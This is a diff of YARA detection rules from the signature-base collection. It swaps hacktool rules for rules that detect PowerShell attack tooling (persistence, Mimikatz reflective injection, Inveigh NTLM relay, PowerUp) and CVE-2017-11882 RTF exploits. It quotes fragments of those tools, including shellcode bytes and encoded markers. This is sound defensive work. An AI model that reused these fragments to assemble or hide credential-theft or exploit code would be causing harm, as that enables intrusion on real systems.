+rule SIGNATURE_BASE_Ps1_Toolkit_Persistence : FILE
 {
 	meta:
-		description = "Detects go based htran variant"
-		author = "Jeff Beley"
-		id = "bd9409e3-3d4c-57d6-af60-b6d6bd93d46b"
-		date = "2019-01-09"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4609-L4622"
+		description = "Auto-generated rule - file Persistence.ps1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "38115391-75ac-5ba8-b31b-dcf4c66179b0"
+		date = "2016-09-04"
+		modified = "2023-12-05"
+		reference = "https://github.com/vysec/ps1-toolkit"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_toolkit.yar#L113-L134"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "444fe8ce2fdb67c982de26a10882d2cfebc4d2de6c4b4ba6ee10cf39130f1cc5"
-		score = 75
+		logic_hash = "bfe6b20fb712fcf7b45d0ef80075bc9a254867d2251109f377a378f887b38494"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		hash1 = "4acbefb9f7907c52438ebb3070888ddc8cddfe9e3849c9d0196173a422b9035f"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "e1a4dd18b481471fc25adea6a91982b7ffed1c2d393c8c17e6e542c030ac6cbd"
 
 	strings:
-		$s1 = "https://github.com/cw1997/NATBypass" fullword ascii
-		$s2 = "-slave ip1:port1 ip2:port2" fullword ascii
-		$s3 = "-tran port1 ip:port2" fullword ascii
+		$s1 = "\"`\"```$Filter=Set-WmiInstance -Class __EventFilter -Namespace ```\"root\\subscription```" ascii
+		$s2 = "}=$PROFILE.AllUsersAllHosts;${" ascii
+		$s3 = "C:\\PS> $ElevatedOptions = New-ElevatedPersistenceOption -Registry -AtStartup" ascii
+		$s4 = "= gwmi Win32_OperatingSystem | select -ExpandProperty OSArchitecture" ascii
+		$s5 = "-eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('MAAxADQAQwA='))))" ascii
+		$s6 = "}=$PROFILE.CurrentUserAllHosts;${" ascii
+		$s7 = "FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBPAG4ASQBkAGwAZQA=')" ascii
+		$s8 = "[System.Text.AsciiEncoding]::ASCII.GetString($MZHeader)" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 7000KB and 1 of them
+		( uint16( 0 ) == 0xbbef and filesize < 200KB and 2 of them ) or ( 4 of them )
 }
-rule SIGNATURE_BASE_SUSP_Katz_PDB : FILE
+rule SIGNATURE_BASE_Ps1_Toolkit_Invoke_Mimikatz_Relfectivepeinjection : FILE
 {
 	meta:
-		description = "Detects suspicious PDB in file"
+		description = "Auto-generated rule - from files Invoke-Mimikatz.ps1, Invoke-RelfectivePEInjection.ps1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "79f4f07c-b234-5203-a2ab-aba4a9cb9f8d"
-		date = "2019-02-04"
-		modified = "2025-04-14"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4624-L4637"
+		id = "e9471f95-48e1-57e0-b0be-f916c574a6a7"
+		date = "2016-09-04"
+		modified = "2023-12-05"
+		reference = "https://github.com/vysec/ps1-toolkit"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_toolkit.yar#L136-L162"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1a38f63d8e8baa9bc8f34c1886fc2aaea7f61d5e09792ba9cde4cf6ed8441fab"
-		score = 65
-		quality = 60
+		logic_hash = "220597cb76c189adc33a9ac740c8164b52743f61523898aefb7a74206b23b76b"
+		score = 80
+		quality = 85
 		tags = "FILE"
-		hash1 = "6888ce8116c721e7b2fc3d7d594666784cf38a942808f35e309a48e536d8e305"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "5c31a2e3887662467cfcb0ac37e681f1d9b0f135e6dfff010aae26587e03d8c8"
+		hash2 = "510b345f821f93c1df5f90ac89ad91fcd0f287ebdabec6c662b716ec9fddb03a"
 
 	strings:
-		$s1 = /\\Release\\[a-z]{0,8}katz.pdb/
-		$s2 = /\\Debug\\[a-z]{0,8}katz.pdb/
+		$s1 = "[IntPtr]$DllAddress = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ReturnValMem, [Type][IntPtr])" fullword ascii
+		$s2 = "if ($GetCommandLineAAddr -eq [IntPtr]::Zero -or $GetCommandLineWAddr -eq [IntPtr]::Zero)" fullword ascii
+		$s3 = "[Byte[]]$Shellcode2 = @(0xc6, 0x03, 0x01, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xbb)" fullword ascii
+		$s4 = "Function Import-DllInRemoteProcess" fullword ascii
+		$s5 = "FromBase64String('QwBvAG4AdABpAG4AdQBlAA==')))" fullword ascii
+		$s6 = "[Byte[]]$Shellcode2 = @(0xc6, 0x03, 0x01, 0x83, 0xec, 0x20, 0x83, 0xe4, 0xc0, 0xbb)" fullword ascii
+		$s7 = "[System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenPrivilegesMem)" fullword ascii
+		$s8 = "[System.Runtime.InteropServices.Marshal]::StructureToPtr($CurrAddr, $FinalAddr, $false) | Out-Null" fullword ascii
+		$s9 = "::FromBase64String('RABvAG4AZQAhAA==')))" ascii
+		$s10 = "Write-Verbose \"PowerShell ProcessID: $PID\"" fullword ascii
+		$s11 = "[IntPtr]$ProcAddress = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ReturnValMem, [Type][IntPtr])" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 6000KB and all of them
+		( uint16( 0 ) == 0xbbef and filesize < 10000KB and 3 of them ) or ( 6 of them )
 }
-rule SIGNATURE_BASE_HKTL_LNX_Pnscan : FILE
+rule SIGNATURE_BASE_Ps1_Toolkit_Inveigh_Bruteforce_2 : FILE
 {
 	meta:
-		description = "Detects Pnscan port scanner"
+		description = "Auto-generated rule - from files Inveigh-BruteForce.ps1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "46c6c0d9-08bb-5de3-ad14-c1a7ab0542c6"
-		date = "2019-05-27"
-		modified = "2025-04-14"
-		reference = "https://github.com/ptrrkssn/pnscan"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4639-L4652"
+		id = "1319b03d-67e8-5155-8037-e3375e39f6a0"
+		date = "2016-09-04"
+		modified = "2023-12-05"
+		reference = "https://github.com/vysec/ps1-toolkit"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_toolkit.yar#L164-L181"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "46a064f9df9d0a0f3fad4ec7be70b1e42074e5e117f7403d8239bc725590f268"
-		score = 55
+		logic_hash = "5c035898a9574e2516cbc66efcf57f7380fd979c4a5099f8a0a190ad21af32c0"
+		score = 80
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "a2ae1e02bcb977cd003374f551ed32218dbcba3120124e369cc150b9a63fe3b8"
 
 	strings:
-		$x1 = "-R<hex list>   Hex coded response string to look for." fullword ascii
-		$x2 = "This program implements a multithreaded TCP port scanner." ascii wide
+		$s1 = "}.NTLMv2_file_queue[0]|Out-File ${" ascii
+		$s2 = "}.NTLMv2_file_queue.RemoveRange(0,1)" ascii
+		$s3 = "}.NTLMv2_file_queue.Count -gt 0)" ascii
+		$s4 = "}.relay_running = $false" ascii
 
 	condition:
-		filesize < 6000KB and 1 of them
+		( uint16( 0 ) == 0xbbef and filesize < 200KB and 2 of them ) or ( 4 of them )
 }
-rule SIGNATURE_BASE_Paexec : FILE
+rule SIGNATURE_BASE_Ps1_Toolkit_Powerup_2 : FILE
 {
 	meta:
-		description = "Detects remote access tool PAEXec (like PsExec) - file PAExec.exe"
+		description = "Auto-generated rule - from files PowerUp.ps1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ee564534-b921-5639-a7ed-5da79d6bf86a"
-		date = "2017-03-27"
-		modified = "2025-04-14"
-		reference = "http://researchcenter.paloaltonetworks.com/2017/03/unit42-shamoon-2-delivering-disttrack/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4654-L4674"
+		id = "11322a66-67d4-574b-acef-35d06e6f95f4"
+		date = "2016-09-04"
+		modified = "2023-12-05"
+		reference = "https://github.com/vysec/ps1-toolkit"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_toolkit.yar#L183-L202"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "30478d90756a9ea362c40236518fe9013e5e5683641b7e7e1ad33aa3b5587e04"
-		score = 40
+		logic_hash = "8cbd86f103d8b49e72787cbb85fc97e6a02d5332039ce29359cb673c273760b7"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		hash1 = "01a461ad68d11b5b5096f45eb54df9ba62c5af413fa9eb544eacb598373a26bc"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "fc65ec85dbcd49001e6037de9134086dd5559ac41ac4d1adf7cab319546758ad"
 
 	strings:
-		$x1 = "Ex: -rlo C:\\Temp\\PAExec.log" fullword ascii
-		$x2 = "Can't enumProcesses - Failed to get token for Local System." fullword wide
-		$x3 = "PAExec %s - Execute Programs Remotely" fullword wide
-		$x4 = "\\\\%s\\pipe\\PAExecIn%s%u" fullword wide
-		$x5 = "\\\\.\\pipe\\PAExecIn%s%u" fullword wide
-		$x6 = "%%SystemRoot%%\\%s.exe" fullword wide
-		$x7 = "in replacement for PsExec, so the command-line usage is identical, with " fullword ascii
-		$x8 = "\\\\%s\\ADMIN$\\PAExec_Move%u.dat" fullword wide
+		$s1 = "if($MyConString -like $([Text.Encoding]::Unicode.GetString([Convert]::" ascii
+		$s2 = "FromBase64String('KgBwAGEAcwBzAHcAbwByAGQAKgA=')))) {" ascii
+		$s3 = "$Null = Invoke-ServiceStart" ascii
+		$s4 = "Write-Warning \"[!] Access to service $" ascii
+		$s5 = "} = $MyConString.Split(\"=\")[1].Split(\";\")[0]" ascii
+		$s6 = "} += \"net localgroup ${" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 600KB and 1 of ( $x* ) ) or ( 3 of them )
+		( uint16( 0 ) == 0xbbef and filesize < 2000KB and 2 of them ) or ( 4 of them )
 }
-rule SIGNATURE_BASE_HKTL_Domainpasswordspray : FILE
+rule SIGNATURE_BASE_Ps1_Toolkit_Persistence_2 : FILE
 {
 	meta:
-		description = "Detects the Powershell password spray tool DomainPasswordSpray"
-		author = "Arnim Rupp"
-		id = "890e4514-2846-54f8-8f32-cc9d2a4ef81b"
-		date = "2023-01-13"
-		modified = "2025-04-14"
-		reference = "https://github.com/dafthack/DomainPasswordSpray"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4676-L4691"
+		description = "Auto-generated rule - from files Persistence.ps1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d79c328b-4471-52bb-882c-12d2e1302c1e"
+		date = "2016-09-04"
+		modified = "2023-12-05"
+		reference = "https://github.com/vysec/ps1-toolkit"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_toolkit.yar#L204-L226"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "aa20bf139eff36100624771fe7617c214337ae5ab2e2746143bd8e6cc1b05b4e"
-		score = 60
+		logic_hash = "47d1c3593edeba02e1c08cc53b4ba3d375b73dd04816b84e807e28be2bcf917e"
+		score = 80
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "44d4c0ae5673d2a076f3b5acdc83063aca49d58e6dd7cf73d0b927f83d359247"
+		hash1 = "e1a4dd18b481471fc25adea6a91982b7ffed1c2d393c8c17e6e542c030ac6cbd"
 
 	strings:
-		$s = "Invoke-DomainPasswordSpray" fullword ascii wide
+		$s1 = "FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBPAG4ASQBkAGwAZQA=')" ascii
+		$s2 = "FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBEAGEAaQBsAHkA')" ascii
+		$s3 = "FromBase64String('UAB1AGIAbABpAGMALAAgAFMAdABhAHQAaQBjAA==')" ascii
+		$s4 = "[Parameter( ParameterSetName = 'ScheduledTaskAtLogon', Mandatory = $True )]" ascii
+		$s5 = "FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAHQATABvAGcAbwBuAA==')))" ascii
+		$s6 = "[Parameter( ParameterSetName = 'PermanentWMIAtStartup', Mandatory = $True )]" fullword ascii
+		$s7 = "FromBase64String('TQBlAHQAaABvAGQA')" ascii
+		$s8 = "FromBase64String('VAByAGkAZwBnAGUAcgA=')" ascii
+		$s9 = "[Runtime.InteropServices.CallingConvention]::Winapi," fullword ascii
 
 	condition:
-		filesize < 100KB and all of them
+		( uint16( 0 ) == 0xbbef and filesize < 200KB and 2 of them ) or ( 4 of them )
 }
-rule SIGNATURE_BASE_HKTL_Rusthound : FILE
+rule SIGNATURE_BASE_Ps1_Toolkit_Inveigh_Bruteforce_3 : FILE
 {
 	meta:
-		description = "Detect hacktool RustHound (Sharphound clone)"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "d2fd79a5-9a1a-51de-920c-61653c8b0064"
-		date = "2023-03-30"
-		modified = "2025-04-14"
-		reference = "https://github.com/OPENCYBER-FR/RustHound"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4693-L4720"
+		description = "Auto-generated rule - from files Inveigh-BruteForce.ps1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d284e93b-dd65-5a39-84e2-287feb6ae05b"
+		date = "2016-09-04"
+		modified = "2023-12-05"
+		reference = "https://github.com/vysec/ps1-toolkit"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_toolkit.yar#L228-L248"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "409f61a34d9771643246f401a9670f6f7dcced9df50cbd89a2e1a5c9ba8d03ab"
-		hash = "b1a58a9c94b1df97a243e6c3fc2d04ffd92bc802edc7d8e738573b394be331a9"
-		hash = "170f4a48911f3ebef674aade05184ea0a6b1f6b089bcffd658e95b9905423365"
-		hash = "e52f6496b863b08296bf602e92a090768e86abf498183aa5b6531a3a2d9c0bdb"
-		hash = "847e57a35df29d40858c248e5b278b09cfa89dd4201cb24262c6158395e2e585"
-		hash = "4edfed92b54d32a58b2cfc926f98a56637e89850410706abcc469a8bc846bc85"
-		hash = "feba0c16830ea0a13819a9ab8a221cc64d5a9b3cc73f3c66c405a171a2069cc1"
-		hash = "21d37c2393a6f748fe34c9d2f52693cb081b63c3a02ca0bebe4a584076f5886c"
-		hash = "874a1a186eb5808d456ce86295cd5f09d6c819375acb100573c2103608af0d84"
-		hash = "bf576bd229393010b2bb4ba17e49604109e294ca38cf19647fc7d9c325f7bcd1"
-		logic_hash = "386b734ad7f3cf02f096236c941033b3f905a3368b8a72dd63e91e6e94f12f8d"
-		score = 75
+		logic_hash = "09afe669e90bd73318a9f9f68fda362451f6611f8585de67176c5dc43f05f937"
+		score = 80
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash3 = "a2ae1e02bcb977cd003374f551ed32218dbcba3120124e369cc150b9a63fe3b8"
 
 	strings:
-		$rh1 = "rusthound" fullword ascii wide
-		$rh2 = "Making json/zip files finished!" ascii wide
+		$s1 = "::FromBase64String('TgBUAEwATQA=')" ascii
+		$s2 = "::FromBase64String('KgBTAE0AQgAgAHIAZQBsAGEAeQAgACoA')))" ascii
+		$s3 = "::FromBase64String('KgAgAGYAbwByACAAcgBlAGwAYQB5ACAAKgA=')))" ascii
+		$s4 = "::FromBase64String('KgAgAHcAcgBpAHQAdABlAG4AIAB0AG8AIAAqAA==')))" ascii
+		$s5 = "[Byte[]] $HTTP_response = (0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20)`" fullword ascii
+		$s6 = "KgAgAGwAbwBjAGEAbAAgAGEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIAAqAA" ascii
+		$s7 = "}.bruteforce_running)" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0x457f ) and 1 of ( $rh* )
+		( uint16( 0 ) == 0xbbef and filesize < 200KB and 2 of them ) or ( 4 of them )
 }
-rule SIGNATURE_BASE_Suspicious_Autoit_By_Microsoft : FILE
+rule SIGNATURE_BASE_SUSP_LNK_Suspicious_Folders_Jan25 : FILE
 {
 	meta:
-		description = "Detects a AutoIt script with Microsoft identification"
-		author = "Florian Roth (Nextron Systems)"
-		id = "69b1c93d-ab12-5fdc-b6eb-fb135796d3a9"
-		date = "2017-12-14"
-		modified = "2025-03-19"
-		reference = "Internal Research - VT"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/generic_anomalies.yar#L380-L395"
+		description = "Detects link files (.LNK) with suspicious folders mentioned in the target path"
+		author = "Florian Roth"
+		id = "5f1bcd18-abec-5831-b24f-519c92a2454e"
+		date = "2025-01-24"
+		modified = "2025-03-20"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mixed_open_source_export.yar#L2-L16"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7dfbaf7d136bd9e151c533b49394a9a596450d9cc2643dc144cb693290004591"
-		score = 60
+		logic_hash = "776adb706e165389d0abdf8d6f719f6db1ec6d2f3d9d96e1c4a5f2b55e482c31"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c0cbcc598d4e8b501aa0bd92115b4c68ccda0993ca0c6ce19edd2e04416b6213"
 
 	strings:
-		$s1 = "Microsoft Corporation. All rights reserved" fullword wide
-		$s2 = "AutoIt" fullword ascii
+		$x1 = "RECYCLER.BIN\\" wide
+		$x2 = "Perflogs\\" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them
+		uint16( 0 ) == 0x004c and 1 of them
 }
-rule SIGNATURE_BASE_SUSP_Size_Of_ASUS_Tuningtool : FILE
+rule SIGNATURE_BASE_Rtf_Cve2017_11882_Ole : MALICIOUS EXPLOIT CVE_2017_11882
 {
 	meta:
-		description = "Detects an ASUS tuning tool with a suspicious size"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d22a1bf9-55d6-5cb4-9537-ad13b23af4d1"
-		date = "2018-10-17"
-		modified = "2022-12-21"
-		reference = "https://www.welivesecurity.com/2018/10/17/greyenergy-updated-arsenal-dangerous-threat-actors/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/generic_anomalies.yar#L397-L412"
+		description = "Attempts to identify the exploit CVE 2017 11882"
+		author = "John Davison"
+		id = "b6c59cf1-52e4-5c9e-b3c3-d973d52736e3"
+		date = "2023-12-05"
+		modified = "2023-12-05"
+		reference = "https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_cve_2017_11882.yar#L1-L17"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5aadb48f61947ff0362bde5f80830b835ca9e3cb7e1c632d153d0ea5f8bbad6c"
+		hash = "51cf2a6c0c1a29abca9fd13cb22421da"
+		logic_hash = "6856d3c78cc06899d2bc1f876dce6b718513ebad80f37d7b5914a14d1da5064c"
 		score = 60
 		quality = 85
-		tags = "FILE"
-		noarchivescan = 1
-		hash1 = "d4e97a18be820a1a3af639c9bca21c5f85a3f49a37275b37fd012faeffcb7c4a"
+		tags = "MALICIOUS, EXPLOIT, CVE_2017_11882"
 
 	strings:
-		$s1 = "\\Release\\ASGT.pdb" ascii
+		$headers = { 1c 00 00 00 02 00 ?? ?? a9 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 03 01 01 03 ?? }
+		$font = { 0a 01 08 5a 5a }
+		$winexec = { 12 0c 43 00 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and filesize > 70KB and all of them
+		all of them and @font > @headers and @winexec == @font + 5 + 44
 }
-rule SIGNATURE_BASE_SUSP_Piratedoffice_2007 : FILE
+rule SIGNATURE_BASE_Rtf_Cve2017_11882 : MALICIOUS EXPLOIT CVE_2017_1182
 {
 	meta:
-		description = "Detects an Office document that was created with a pirated version of MS Office 2007"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b36e9a59-7617-503b-968d-5b6b72b227ea"
-		date = "2018-12-04"
-		modified = "2025-03-19"
-		reference = "https://twitter.com/pwnallthethings/status/743230570440826886?lang=en"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/generic_anomalies.yar#L414-L427"
+		description = "Attempts to identify the exploit CVE 2017 11882"
+		author = "John Davison"
+		id = "b6c59cf1-52e4-5c9e-b3c3-d973d52736e3"
+		date = "2023-12-05"
+		modified = "2023-12-05"
+		reference = "https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_cve_2017_11882.yar#L20-L39"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ff94483944a4a4e4bc3cba26fc08fc2a5239f27b301b2ca7cca5edc092c2fc73"
-		score = 40
-		quality = 85
-		tags = "FILE"
-		hash1 = "210448e58a50da22c0031f016ed1554856ed8abe79ea07193dc8f5599343f633"
+		hash = "51cf2a6c0c1a29abca9fd13cb22421da"
+		logic_hash = "37a65f086d393aae3dc88b3dd2520fff6e96b92fd6ae1be0a110f4eb826ae12d"
+		score = 60
+		quality = 81
+		tags = "MALICIOUS, EXPLOIT, CVE_2017_1182"
 
 	strings:
-		$s7 = "<Company>Grizli777</Company>" ascii
+		$headers = { 31 63 30 30 30 30 30 30  30 32 30 30 ?? ?? ?? ??
+                     61 39 30 30 30 30 30 30  ?? ?? ?? ?? ?? ?? ?? ??
+                     ?? ?? ?? ?? ?? ?? ?? ??  ?? ?? ?? ?? ?? ?? ?? ??
+                     ?? ?? ?? ?? ?? ?? ?? ??  30 33 30 31 30 31 30 33
+                     ?? ?? }
+		$font = { 30 61 30 31 30 38 35 61  35 61 }
+		$winexec = { 31 32 30 63 34 33 30 30 }
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and filesize < 300KB and all of them
+		all of them and @font > @headers and @winexec == @font + ( ( 5 + 44 ) * 2 )
 }
-rule SIGNATURE_BASE_SUSP_Scheduled_Task_Bigsize : FILE
+rule SIGNATURE_BASE_Packager_Cve2017_11882 : CVE_2017_11882 FILE
 {
 	meta:
-		description = "Detects suspiciously big scheduled task XML file as seen in combination with embedded base64 encoded PowerShell code"
-		author = "Florian Roth (Nextron Systems)"
-		id = "61b07b30-1058-5a53-99e7-2c48ec9d23b5"
-		date = "2018-12-06"
-		modified = "2025-03-19"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/generic_anomalies.yar#L429-L445"
+		description = "Attempts to exploit CVE-2017-11882 using Packager"
+		author = "Rich Warren"
+		id = "57ff395e-e56a-5e63-bde6-f3cef038fcd6"
+		date = "2023-12-05"
+		modified = "2023-12-05"
+		reference = "https://github.com/rxwx/CVE-2017-11882/blob/master/packager_exec_CVE-2017-11882.py"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_cve_2017_11882.yar#L41-L56"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "dcc06261b1ea39c587d8bcefbb8e85e6b9016da01bf66c2eefe5bd7bbdfc6968"
-		score = 65
-		quality = 85
-		tags = "FILE"
+		logic_hash = "94e0c70e8140bb7fa3d184447617b534a8b9a24cdad535e6818be9662f0b9144"
+		score = 60
+		quality = 54
+		tags = "CVE-2017-11882, FILE"
 
 	strings:
-		$a0 = "<Task version=" ascii wide
-		$a1 = "xmlns=\"http://schemas.microsoft.com/windows/" ascii wide
-		$fp1 = "</Counter><Counter>" wide
-		$fp2 = "Office Feature Updates Logon" wide
-		$fp3 = "Microsoft Shared" fullword wide
+		$font = { 30 61 30 31 30 38 35 61  35 61 }
+		$equation = { 45 71 75 61 74 69 6F 6E 2E 33 }
+		$package = { 50 61 63 6b 61 67 65 }
+		$header_and_shellcode = /03010[0,1][0-9a-fA-F]{108}00/ ascii nocase
 
 	condition:
-		uint16( 0 ) == 0xfeff and filesize > 20KB and all of ( $a* ) and not 1 of ( $fp* )
+		uint32be( 0 ) == 0x7B5C7274 and all of them
 }
-rule SIGNATURE_BASE_SUSP_Putty_Unnormal_Size : FILE
+rule SIGNATURE_BASE_CVE_2017_11882_RTF : CVE_2017_11882 FILE
 {
 	meta:
-		description = "Detects a putty version with a size different than the one provided by Simon Tatham (could be caused by an additional signature or malware)"
+		description = "Detects suspicious Microsoft Equation OLE contents as used in CVE-2017-11882"
 		author = "Florian Roth (Nextron Systems)"
-		id = "576b118c-d4be-5ce2-994a-ce3f943dda88"
-		date = "2019-01-07"
-		modified = "2022-06-30"
+		id = "400689ff-e856-5cbf-a7fa-93f6a8d8dbb9"
+		date = "2018-02-13"
+		modified = "2023-12-05"
 		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/generic_anomalies.yar#L447-L497"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_cve_2017_11882.yar#L58-L80"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2f2c21cc25eaba8c1812db617203427a59e9a55f8620676e4bbe4cb3cd4071fd"
-		score = 50
+		logic_hash = "729fa8215a24990371369158d4582cc0ba9387eb0e7221860bf7216046c447cb"
+		score = 60
 		quality = 85
-		tags = "FILE"
-		hash1 = "e5e89bdff733d6db1cffe8b3527e823c32a78076f8eadc2f9fd486b74a0e9d88"
-		hash2 = "ce4c1b718b54973291aefdd63d1cca4e4d8d4f5353a2be7f139a290206d0c170"
-		hash3 = "adb72ea4eab7b2efc2da6e72256b5a3bb388e9cdd4da4d3ff42a9fec080aa96f"
-		hash4 = "1c0bd6660fa43fa90bd88b56cdd4a4c2ffb4ef9d04e8893109407aa7039277db"
+		tags = "CVE-2017-11882, FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "SSH, Telnet and Rlogin client" fullword wide
-		$v1 = "Release 0.6" wide
-		$v2 = "Release 0.70" wide
-		$fp1 = "KiTTY fork" fullword wide
-
-	condition:
-		uint16( 0 ) == 0x5a4d and $s1 and 1 of ( $v* ) and not 1 of ( $fp* ) and filesize != 524288 and filesize != 495616 and filesize != 483328 and filesize != 524288 and filesize != 712176 and filesize != 828400 and filesize != 569328 and filesize != 454656 and filesize != 531368 and filesize != 524288 and filesize != 483328 and filesize != 713592 and filesize != 829304 and filesize != 571256 and filesize != 774200 and filesize != 854072 and filesize != 665144 and filesize != 774200 and filesize != 854072 and filesize != 665144 and filesize != 640000 and filesize != 650720 and filesize != 662808 and filesize != 651256 and filesize != 664432
-}
-rule SIGNATURE_BASE_SUSP_RTF_Header_Anomaly : FILE
-{
-	meta:
-		description = "Detects malformed RTF header often used to trick mechanisms that check for a full RTF header"
-		author = "Florian Roth (Nextron Systems)"
-		id = "fb362640-9a45-5ee5-8749-3980e0549932"
-		date = "2019-01-20"
-		modified = "2022-09-15"
-		reference = "https://twitter.com/ItsReallyNick/status/975705759618158593"
